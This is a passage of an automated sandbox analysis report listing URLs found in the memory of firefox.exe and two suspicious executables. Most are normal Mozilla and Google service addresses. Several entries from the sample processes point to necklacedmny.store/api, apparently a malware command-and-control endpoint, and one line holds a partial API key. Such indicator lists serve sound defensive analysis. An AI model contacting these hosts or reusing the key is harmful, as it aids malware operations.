Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sAttempted
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sresource://gre/modules/PrivateBrowsingUtils.sys.mj
Source: firefox.exe, 0000001A.00000002.3185612064.000002592F67D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001A.00000002.3185612064.000002592F67D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001E.00000002.3158958475.0000023D45585000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001A.00000002.3186609548.000002592FAB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.comhttps://truecolors.firefox.comhttps://screenshots.firefox.combookmarksToo
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: c1b0009d40.exe, 0000000B.00000003.3047105914.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2998374022.0000000001195000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.3027758053.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2959630451.0000000001195000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.3005709790.000000000119A000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2998226532.0000000001190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/
Source: c1b0009d40.exe, 0000000B.00000003.2998374022.0000000001195000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.3027758053.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2998226532.0000000001190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/J
Source: c1b0009d40.exe, 0000000B.00000003.2959630451.0000000001195000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/Z
Source: c1b0009d40.exe, 0000000B.00000003.2938184062.0000000001195000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/a
Source: c1b0009d40.exe, 0000000B.00000003.2998226532.0000000001190000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3173096686.0000000001663000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3172858009.0000000001670000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3174074100.0000000001674000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3149550267.0000000005E33000.00000004.00000800.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3174670327.0000000001665000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api
Source: file.exe, 00000000.00000003.2281042245.0000000006127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api3G
Source: file.exe, 00000000.00000003.2198672347.0000000001688000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api4
Source: c1b0009d40.exe, 0000000B.00000003.3046266365.00000000011B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiEp1h
Source: file.exe, 00000000.00000003.2281042245.0000000006127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiIG
Source: file.exe, 00000000.00000003.2141962059.0000000006126000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141685135.0000000006127000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141347007.0000000006126000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiT
Source: c1b0009d40.exe, 00000019.00000003.3173096686.0000000001663000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3174670327.0000000001665000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api_
Source: file.exe, 00000000.00000003.2198832216.000000000163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apib
Source: c1b0009d40.exe, 00000019.00000003.3172858009.0000000001670000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3174074100.0000000001674000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apid
Source: file.exe, 00000000.00000003.2198832216.000000000163E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apie
Source: file.exe, 00000000.00000003.2182362754.000000000612B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apifG
Source: c1b0009d40.exe, 00000019.00000003.3172858009.0000000001670000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 00000019.00000003.3174074100.0000000001674000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apii%
Source: c1b0009d40.exe, 0000000B.00000003.3046266365.00000000011B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiq
Source: file.exe, 00000000.00000003.2198672347.0000000001688000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/p
Source: c1b0009d40.exe, 0000000B.00000003.2998374022.0000000001195000.00000004.00000020.00020000.00000000.sdmp, c1b0009d40.exe, 0000000B.00000003.2998226532.0000000001190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/z
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FBDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%sFailed
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001A.00000002.3185612064.000002592F67D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sbrowser.download.viewableInternally.unavailable:FEATURE_FAILU
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.comMOZ_BROWSER_TOOLBOX_BINARY
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001A.00000003.3099152165.0000025935B67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001A.00000002.3186609548.000002592FAB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001A.00000003.2995647745.0000025933A1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com//shims/mochitest-shim-3.js
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001A.00000003.3097703170.0000025935B79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3099152165.0000025935B67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3186609548.000002592FA08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001A.00000003.3097703170.0000025935B79000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001A.00000003.3072690944.000002593B875000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001E.00000002.3158958475.0000023D45512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 0000001A.00000003.3153782991.000002593D8DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158958475.0000023D455BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsopenIDB/
Source: firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001A.00000002.3176703968.0000025923903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3188027583.000002592FB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001A.00000002.3185098881.000002592F4C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3160427370.0000021CD9840000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3162553916.0000023D45A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
